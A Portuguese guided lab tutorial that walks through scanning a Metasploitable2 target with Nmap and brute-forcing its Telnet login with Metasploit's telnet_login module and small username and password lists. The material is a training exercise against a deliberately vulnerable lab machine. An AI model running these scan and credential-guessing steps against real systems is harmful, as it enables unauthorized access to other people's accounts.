Explorar Vulnerabilidade do Serviço Telnet com Metasploit

NmapBeginner
Pratique Agora

Introdução

Neste laboratório, aprenderemos como explorar a vulnerabilidade do serviço Telnet e realizar um ataque de penetração. O cenário envolve o uso da máquina Kali Linux como máquina de ataque e a máquina virtual Metasploitable2 como máquina alvo. O objetivo é escanear a máquina alvo em busca de vulnerabilidades, identificar a vulnerabilidade do serviço Telnet e explorá-la usando o Metasploit Framework.

Este é um Lab Guiado, que fornece instruções passo a passo para ajudá-lo a aprender e praticar. Siga as instruções cuidadosamente para completar cada etapa e ganhar experiência prática. Dados históricos mostram que este é um laboratório de nível iniciante com uma taxa de conclusão de 93%. Recebeu uma taxa de avaliações positivas de 83% dos estudantes.

Iniciar o Ambiente do Laboratório

Nesta etapa, iniciaremos o ambiente do laboratório, que inclui o container Kali Linux e a máquina virtual Metasploitable2.

  1. Abra um terminal xfce na máquina host LabEx e inicie o alvo Metasploitable2 executando o seguinte comando:
sudo virsh start Metasploitable2

Aguarde o início da máquina alvo, o que pode levar de 1 a 3 minutos.

  1. Teste a conectividade com a máquina alvo fazendo um ping:
ping 192.168.122.102

Pressione Ctrl+C para parar o ping.

  1. Inicie o container Kali Linux e entre no ambiente bash executando:
docker run -ti --network host b5b709a49cd5 bash
  1. Dentro do container Kali, teste a conexão de rede com a máquina alvo:
ping 192.168.122.102

Pressione Ctrl+C para parar o ping.

Agora, tanto a máquina de ataque quanto a máquina alvo estão em execução, e você pode iniciar o teste de penetração.

Observação: Se você sair acidentalmente do bash atual, o container Kali irá parar automaticamente. Você pode executar docker run -ti --network host b5b709a49cd5 bash novamente no host para iniciar um novo container Kali e entrar no bash para continuar o experimento.

Realizar a Varredura de Vulnerabilidades

Nesta etapa, usaremos o Nmap para escanear a máquina alvo em busca de portas e serviços abertos.

Primeiro, inicie o banco de dados PostgreSQL, pois o Metasploit o requer para armazenamento de dados:

service postgresql start
msfdb init
cd ~
msfconsole

Dentro do console Metasploit, execute a varredura Nmap contra a máquina alvo:

nmap -sV -T4 192.168.122.102

A opção -sV escaneia as portas abertas e mostra informações detalhadas sobre as portas, enquanto -T4 define a política de tempo da varredura (0-5, valores mais altos são mais rápidos, mas mais ruidosos).

Analisar os Resultados da Varredura

Nesta etapa, analisaremos os resultados da varredura Nmap para identificar o serviço Telnet vulnerável.

A saída da varredura Nmap mostra que o serviço Telnet está rodando na porta 23 com o banner "Linux telnetd". Vamos procurar o módulo Metasploit correspondente:

search scanner/telnet

Use o módulo auxiliary/scanner/telnet/telnet_login:

use auxiliary/scanner/telnet/telnet_login

Mostre as opções do módulo:

show options

A opção necessária é RHOSTS, que especifica o(s) host(s) alvo.

Pressione Ctrl+D para sair do console Metasploit e então iniciar a inspeção

Preparar o Dicionário de Nomes de Usuário e Senhas

Nesta etapa, prepararemos os arquivos de dicionário de nomes de usuário e senhas para o ataque de força bruta (brute-force) de login.

Abra um novo terminal e conecte-se ao container Kali:

docker run -ti --network host b5b709a49cd5 bash

Crie um arquivo username.txt no diretório / com os seguintes nomes de usuário:

123456
admin
msfadmin
root
kali

Crie outro arquivo password.txt no diretório / com as seguintes senhas:

abc123
1234
123456
root
msfadmin
admin
toor

Esses arquivos serão usados como os dicionários de nomes de usuário e senhas para o ataque de força bruta.

Configurar o Módulo Metasploit

Nesta etapa, configuraremos o módulo Metasploit com o host alvo, o dicionário de nomes de usuário e o dicionário de senhas.

Primeiramente, se você não estiver no console Metasploit, deverá iniciar o console Metasploit:

cd ~
msfconsole

Use o módulo auxiliary/scanner/telnet/telnet_login:

use auxiliary/scanner/telnet/telnet_login

Defina o host alvo:

set RHOSTS 192.168.122.102

Defina o arquivo de dicionário de nomes de usuário:

set USER_FILE /username.txt

Defina o arquivo de dicionário de senhas:

set PASS_FILE /password.txt

Por fim, execute o exploit:

exploit

O Metasploit começará a tentar diferentes combinações de nomes de usuário e senhas dos dicionários fornecidos. Se uma credencial válida for encontrada, ela será exibida em verde.

Neste caso, a credencial válida é msfadmin/msfadmin.

Pressione Ctrl+D para sair do console Metasploit e então iniciar a inspeção

Resumo

Neste laboratório, aprendemos como explorar a vulnerabilidade do serviço Telnet usando o Metasploit Framework. Começamos configurando o ambiente do laboratório com a máquina de ataque Kali Linux e a máquina alvo Metasploitable2. Em seguida, realizamos a varredura de vulnerabilidades usando o Nmap para identificar o serviço Telnet aberto. Depois, preparamos os dicionários de nomes de usuário e senhas e configuramos o módulo Metasploit com o host alvo e os arquivos de dicionário. Finalmente, executamos o exploit e realizamos com sucesso o ataque de força bruta (brute-force) nas credenciais de login do Telnet.

Este laboratório proporcionou experiência prática em testes de penetração (penetration testing), varredura de vulnerabilidades e utilização do Metasploit Framework para explorar vulnerabilidades. Ele destacou a importância de práticas seguras de senhas e os riscos potenciais de usar credenciais fracas ou facilmente adivinháveis.